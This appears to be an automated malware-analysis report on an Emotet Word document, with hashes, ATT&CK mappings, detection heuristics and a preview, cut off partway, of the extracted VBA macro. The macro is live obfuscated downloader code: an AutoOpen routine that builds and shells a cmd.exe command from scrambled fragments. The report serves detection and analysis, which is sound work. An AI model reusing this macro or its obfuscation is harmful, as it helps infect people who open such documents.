Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9eb4bba67420675d…

MALICIOUS

Office (OLE)

Size: 91.2 KB
Created: 2018-08-02 20:18:00
Authoring application: Microsoft Office Word
First seen: 2018-08-26
MD5: b60868200051d30950498b26b2d363ef
SHA-1: 084b4d6c3dd872df159e9680635b259fe52c2236
SHA-256: 9eb4bba67420675dfd10fdd1049e93444d99ddeecc9e10ebbf32686b5ea17290
Risk Score: 142

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, a common Emotet technique. The macro attempts to execute a command-line payload using cmd.exe, constructing a complex command string from concatenated parts. This indicates the document is a downloader for a second-stage payload.

Heuristics (5)

  • ClamAV: Doc.Downloader.Emotet-6884163-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884163-0
  • VBA macros detected [medium] (OLE_VBA_MACROS), 1 related finding
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5263 bytes
SHA-256: 48faf61a1457b539bc4943f55fd448c0c52b0e0d3518343685704c8e1176b1d3
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "NtTbcDhbbitsfz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName CDate(RriLS)
   TypeName ChrB(wTdqMR / 61661 + 46241 / WhoVG)
   TypeName Rnd(DrPJjK + rIJCUO / LYMliK / NBbHQb)
   TypeName 53
Shell@ CStr("c") + CStr("m") + zEIdDvlWQJUJ + dhjLzjQwap + qqaKFzzRA + zvLjhwLQ + LDtnTrunazS + SiLUhiAzlwL + XjqiwEaNEP, 549412026 - 549412026
   TypeName 71862376
   TypeName Cos(qpnCSj / piqUIt)
   TypeName Log(MzjwP)
End Sub


Attribute VB_Name = "uQifLaQOTdp"
Function qqaKFzzRA()
On Error Resume Next
TypeName Sgn(408)
   TypeName ChrW(wTAuAl)
LnzjN = "d /" + "V:O/C" + CStr(Chr(YYHNkwWHl + bvVLKbOLo + 34 + FizpaatNR + NBufcQzSt)) + "set " + "kv" + "Ld=rNNiwJ" + "cBZtQz" + "QZMp"
TypeName 450
   TypeName Round(UKoYFR)
   TypeName CStr(99788 + 90111)
UQlDtCZ = "WkBhVICtME" + "G" + "DBPmXA" + "hmWa" + "{ (jvuf/g" + "5xs" + "),=OFoe+" + "4ld7R$}" + "S'.@\;" + "y:qnb6-&&" + "for %U in" + " (1"
TypeName Tan(WWpbjb)
   TypeName Round(sZJDp)
FwMbdpiFj = "5,54,4" + ",5" + "5,0" + "," + "48,33," + "55,58,5" + "8,38" + ",62,3,17,6" + "1,51,"
TypeName CStr(OrSbo / 61807)
   TypeName 1
oLDYfUYlzD = "73,55,4," + "7" + "6,54,74,4" + "0,5" + "5,6,23,38" + ",2,55,2"
TypeName Chr(QJniPW)
   TypeName Log(510220550)
ZoGLzYp = "3,66,35" + "," + "55,7" + "4,22" + ",58,3,55,7" + "3,23,69" + ",62,5" + ",29,73,51," + "65,33,2"
TypeName BkikMO
   TypeName ChrB(833)
   TypeName CBool(ZBYcc)
TqjJI = "3,23,15,71" + "," + "44,44" + ",54,73,5" + "8,3,73," + "55,15," + "6,5" + "9,54," + "6,66,6" + ",54,34" + ",44,21,6" + "7,3"
TypeName Sgn(puZLt)
   TypeName 2
   TypeName 241688633
MFdcaA = "3,23," + "23," + "15,71" + ",44,4" + "4,0,54"
TypeName Chr(640)
   TypeName CDate(9)
DWkCW = ",70,36," + "58,0,55,7" + "3," + "23,36,58,4" + "8,48,59," + "6" + "6" + ",6,54,3"
TypeName CDbl(LtjPiH)
   TypeName Log(ilXbOp)
   TypeName Oct(93)
AYtjn = "4," + "44,22," + "75," + "67,33" + ",23,23,15," + "71,44,4" + "4," + "59," + "55,6,5" + "4" + ",0,48" + ",2" + "3,54,4"
qqaKFzzRA = LnzjN + UQlDtCZ + FwMbdpiFj + oLDYfUYlzD + ZoGLzYp + TqjJI + MFdcaA + DWkCW + AYtjn
   TypeName CStr(tMMiw - 14274 + 69123 + NINBPY)
   TypeName Round(95)
End Function
Function zvLjhwLQ()
On Error Resume Next
TypeName Oct(wNKhlj + oUwZEo + richj + wVvAcK)
   TypeName Fix(4)
   TypeName Sqr(kAvNQ)
KszOGqa = "3,4" + "3,66,6,54," + "34,44" + ",72,33," + "36," + "67,33,23" + ",2" + "3,15" + ",71" + ",44,44,55" + ",36,45,58" + ",55,75,66,"
TypeName 2774
   TypeName CLng(zwnBLW)
IwzudFI = "73,55" + "," + "23,44," + "59,72,72" + ",31,0,67" + ",3" + "3,23,23,15" + ",71,4"
TypeName Hex(jXbDo - zHwtRT - 60108 * szaSJF)
   TypeName 3080
ZhdhPQnZ = "4," + "44,15," + "3" + "6" + ",0,23,76,2" + "3,3,34," + "55,74,42,4" + "8,3,73" + ",55,48,48," + "66,54,0,45"
TypeName CStr(WzdQn)
   TypeName MwKAa
uLGlNGlSDI = ",4" + "4,5,55,15," + "5,5" + "3,33,53,11" + ",65," + "66,64,15,5" + "8,3,23,3" + "9,65" + ",67,65" + ",49" + ",69,62,22," + "26,"
TypeName CByte(443)
   TypeName Rnd(20577 * DVSGiU * vCkDL + wSGLjr)
mNmnSFHBb = "40,38,51,3" + "8,65,60" + ",57,4" + "6,65,6" + "9,62,5" + "2,3,11," + "51,62," + "55,73"
TypeName FWUjS
   TypeName Sin(7537)
   TypeName 4
PQzpDAaz = ",41,71,2" + "3,55,34,1" + "5,56," + "65,68,65" + ",56,6" + "2,22,26," + "40,56,65,6"
TypeName Sgn(23077 * aXswJs)
   TypeName 5679
qIQzXMLUFv = "6,55," + "47,55,6" + "5,69,4" + "3,54,0,5" + "5,36,6" + ",33," + "39," + "62,36,15" + ",74,38,3," + "73,38,6"
TypeName Sgn(88278 * HzddY + 53809 + 84424)
   TypeName Sqr(URAVOh - JlOwz)
   TypeName Fix(9095)
dzHnf = "2,5,2" + "9,73,49" + ",37,23," + "0" + ",70,3" + "7,62,3" + ",17,61,6" + "6,27,5" + "4,4,73,58" + ",54,36" + ",59," + "53,3,5" + "8,55"
TypeName CDate(3)
   TypeName 36
   TypeName Log(3518)
PIzplczHsnw = ",3" + "9,62" + ",36,15,74," + "50,38," +
... (truncated)